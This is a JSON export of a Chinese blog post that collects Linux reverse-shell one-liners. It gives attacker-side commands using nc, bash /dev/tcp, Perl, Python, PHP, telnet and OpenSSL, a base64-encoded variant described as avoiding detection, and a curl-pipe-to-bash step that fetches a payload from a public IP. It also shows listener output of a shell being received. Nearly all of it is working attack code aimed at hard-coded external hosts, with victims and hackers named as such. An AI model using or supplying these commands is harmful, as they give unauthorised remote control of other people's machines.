{"id":1361,"date":"2025-01-19T21:25:52","date_gmt":"2025-01-19T13:25:52","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1361"},"modified":"2025-01-19T21:25:54","modified_gmt":"2025-01-19T13:25:54","slug":"05-linux%e5%8f%8d%e5%bc%b9shell%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/19\/05-linux%e5%8f%8d%e5%bc%b9shell%e6%96%b9%e6%b3%95\/","title":{"rendered":"05. Linux\u53cd\u5f39Shell\u65b9\u6cd5"},"content":{"rendered":"<h3>\u4e00\u3001NC\uff08linux\u81ea\u5e26\u5de5\u5177\uff09<\/h3>\n<h4>1.NC\u6b63\u5411Shell(\u6bd4\u8f83\u5c11\u7528\uff0c\u9ed1\u5ba2\u5728\u516c\u7f51\uff0c\u53d7\u5bb3\u8005\u5728\u5185\u7f51)<\/h4>\n<pre><code>\u88ab\u63a7\u7aef\uff1a\nnc -lvvp 6666 -e \/bin\/sh\n\n\u63a7\u5236\u7aef\uff1a\nnc 10.10.1.7 6666\n\n\u539f  \u7406\uff1a\n\u88ab\u63a7\u7aef\u4f7f\u7528nc\u5c06\/bin\/sh\u7ed1\u5b9a\u5230\u672c\u5730\u76846666\u7aef\u53e3\uff0c\u63a7\u5236\u7aef\u4e3b\u52a8\u8fde\u63a5\u88ab\u63a7\u7aef\u76846666\u7aef\u53e3\uff0c\u5373\u53ef\u83b7\u5f97shell\n<\/code><\/pre>\n<h4>2.NC\u53cd\u5411Shell(\u4e00\u822c\u90fd\u7528\u8fd9\u4e2a\uff0c\u53d7\u5bb3\u8005\u4e3b\u52a8\u8fde\u63a5\u9ed1\u5ba2)<\/h4>\n<pre><code>\u63a7\u5236\u7aef\uff1a \nnc -lvvp 6666 \n\n\u88ab\u63a7\u7aef\uff1a \nnc -e \/bin\/sh 10.10.1.11 6666\n\n\u539f\u7406\uff1a \n\u88ab\u63a7\u7aef\u4f7f\u7528nc\u5c06\/bin\/sh\u53d1\u9001\u5230\u63a7\u5236\u7aef\u76846666\u7aef\u53e3\uff0c\u63a7\u5236\u7aef\u53ea\u9700\u8981\u76d1\u542c\u672c\u5730\u76846666\u7aef\u53e3\uff0c\u5373\u53ef\u83b7\u5f97shell\u3002\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217144055.png\" alt=\"Pasted image 20241217144055.png\"><\/p>\n<h3>\u4e8c\u3001Bash\uff08linux\u81ea\u5e26\u5de5\u5177\uff09<\/h3>\n<pre><code>\u88ab\u63a7\u7aef\uff1a\nbash -i &gt;&amp; \/dev\/tcp\/47.101.214.85\/6666 0&gt;&amp;1 \n\n\u63a7\u5236\u7aef\uff1a \nnc \u2013lvvp 6666\n<\/code><\/pre>\n<p>\u53d8\u79cd\uff08\u9632\u6b62\u88ab\u53d1\u73b0\uff09\uff1a<\/p>\n<pre><code>\u88ab\u63a7\u7aef\uff1a\nexec 5&lt;&gt;\/dev\/tcp\/139.155.49.43\/6666;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done\n\n\u63a7\u5236\u7aef\uff1a\nnc \u2013lvvp 6666\n\nbase64\u7f16\u7801\u7ed5\u8fc7\uff1a \nbash -c &quot;echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuMjE0Ljg1LzY2NjYgMD4mMQ==|base64 -d|bash -i&quot;\n<\/code><\/pre>\n<h3>\u4e09\u3001Perl\uff08\u811a\u672c\u8bed\u8a00\uff09&#8211;socket\u7f16\u7a0b<\/h3>\n<p>\u53ea\u9700\u5c06ip\u6539\u4e3a\u9ed1\u5ba2ip\u5c31\u884c<\/p>\n<pre><code>perl -e 'use Socket;$i=&quot;47.101.214.85&quot;;$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};'\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217145712.png\" alt=\"Pasted image 20241217145712.png\"><\/p>\n<pre><code>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;47.101.214.85:6666&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217150122.png\" alt=\"Pasted image 20241217150122.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217150050.png\" alt=\"Pasted image 20241217150050.png\"><\/p>\n<h3>\u56db\u3001Curl\uff08curl\u7a0b\u5e8f\uff09<\/h3>\n<h4>1.vps<\/h4>\n<pre><code>root@VM-0-2-ubuntu:~# cat index.html\nbash -i &gt;&amp; \/dev\/tcp\/139.155.49.43\/6666 0&gt;&amp;1\n\nroot@VM-0-2-ubuntu:~# python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n47.101.214.85 - - [03\/Dec\/2020 09:21:39] &quot;GET \/index.html HTTP\/1.1&quot; 200 -\n<\/code><\/pre>\n<h4>2.target<\/h4>\n<pre><code>curl 139.155.49.43:8000|bash\n\u6216\ncurl http:\/\/139.155.49.43:8000\/index.html|bash\n<\/code><\/pre>\n<h4>3.\u6d4b\u8bd5\u7ed3\u679c<\/h4>\n<pre><code>root@VM-0-2-ubuntu:~# nc -lvvp 6666\nListening on [0.0.0.0] (family 0, port 6666)\nConnection from 47.101.214.85 46370 received!\nroot@iZuf6j06q5f1lZ:~#\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217153716.png\" alt=\"Pasted image 20241217153716.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217153733.png\" alt=\"Pasted image 20241217153733.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217153658.png\" alt=\"Pasted image 20241217153658.png\"><\/p>\n<h3>\u4e94\u3001Python\uff08\u811a\u672c\u8bed\u8a00\uff09<\/h3>\n<p>Python\u4e00\u884c\u547d\u4ee4\u53cd\u5f39shell<\/p>\n<pre><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;47.101.214.85&quot;,6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);'\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217154133.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217154133.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241217154133.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217154119.png\" alt=\"Pasted image 20241217154119.png\"><\/p>\n<h3>\u516d\u3001PHP\uff08\u811a\u672c\u8bed\u8a00\uff09<\/h3>\n<p>PHP\u4e00\u884c\u547d\u4ee4\u53cd\u5f39shell<\/p>\n<pre><code>php -r '$sock=fsockopen(&quot;47.101.214.85&quot;,6666);exec(&quot;\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);'\n<\/code><\/pre>\n<h3>\u4e03\u3001Telnet\uff08\u8fdc\u7a0b\u8fde\u63a5\u5de5\u5177\uff09<\/h3>\n<pre><code>\u653b\u51fb\u673a\uff1a\nnc -lvvp 5555\nnc -lvvp 6666\n\n\u76ee\u6807\u673a\uff1a \ntelnet 47.101.214.85 5555 | \/bin\/bash | telnet 47.101.214.85 6666\n<\/code><\/pre>\n<h3>\u516b\u3001OpenSSL\uff08\u5de5\u5177\uff09<\/h3>\n<p>openssl\u53cd\u5f39443\u7aef\u53e3\uff0c\u6d41\u91cf\u52a0\u5bc6\u4f20\u8f93<\/p>\n<ol>\n<li>\u5728\u8fdc\u7a0b\u653b\u51fb\u4e3b\u673a\u4e0a\u751f\u6210\u79d8\u94a5\u6587\u4ef6<\/li>\n<\/ol>\n<pre><code>openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n<\/code><\/pre>\n<ol start=\"2\">\n<li>\u5728\u8fdc\u7a0b\u653b\u51fb\u4e3b\u673a\u4e0a\u542f\u52a8\u76d1\u89c6\u5668<\/li>\n<\/ol>\n<pre><code>openssl s_server -quiet -key key.pem -cert cert.pem -port 443\n<\/code><\/pre>\n<ol start=\"3\">\n<li>\u5728\u76ee\u6807\u673a\u4e0a\u53cd\u5f39shell<\/li>\n<\/ol>\n<pre><code>mkfifo \/tmp\/s; \/bin\/sh -i &lt; \/tmp\/s 2&gt;&amp;1 | openssl s_client -quiet -connect 10.34.126.129:443 &gt; \/tmp\/s\n<\/code><\/pre>\n<p>\u5982\u679c\/tmp\/s\u6587\u4ef6\u5b58\u5728,\u5220\u9664<\/p>\n<pre><code>rm \/tmp\/s\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217160102.png\" alt=\"Pasted image 20241217160102.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217160048.png\" alt=\"Pasted image 20241217160048.png\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001NC\uff08linux\u81ea\u5e26\u5de5\u5177\uff09 1.NC\u6b63\u5411Shell(\u6bd4\u8f83\u5c11\u7528\uff0c\u9ed1\u5ba2\u5728\u516c\u7f51\uff0c\u53d7\u5bb3\u8005\u5728\u5185\u7f51) \u88ab\u63a7\u7aef\uff1a nc  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,9],"tags":[],"class_list":["post-1361","post","type-post","status-publish","format-standard","hentry","category-linuxshell","category-9"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1361","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1361"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1361\/revisions"}],"predecessor-version":[{"id":1362,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1361\/revisions\/1362"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1361"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1361"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1361"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}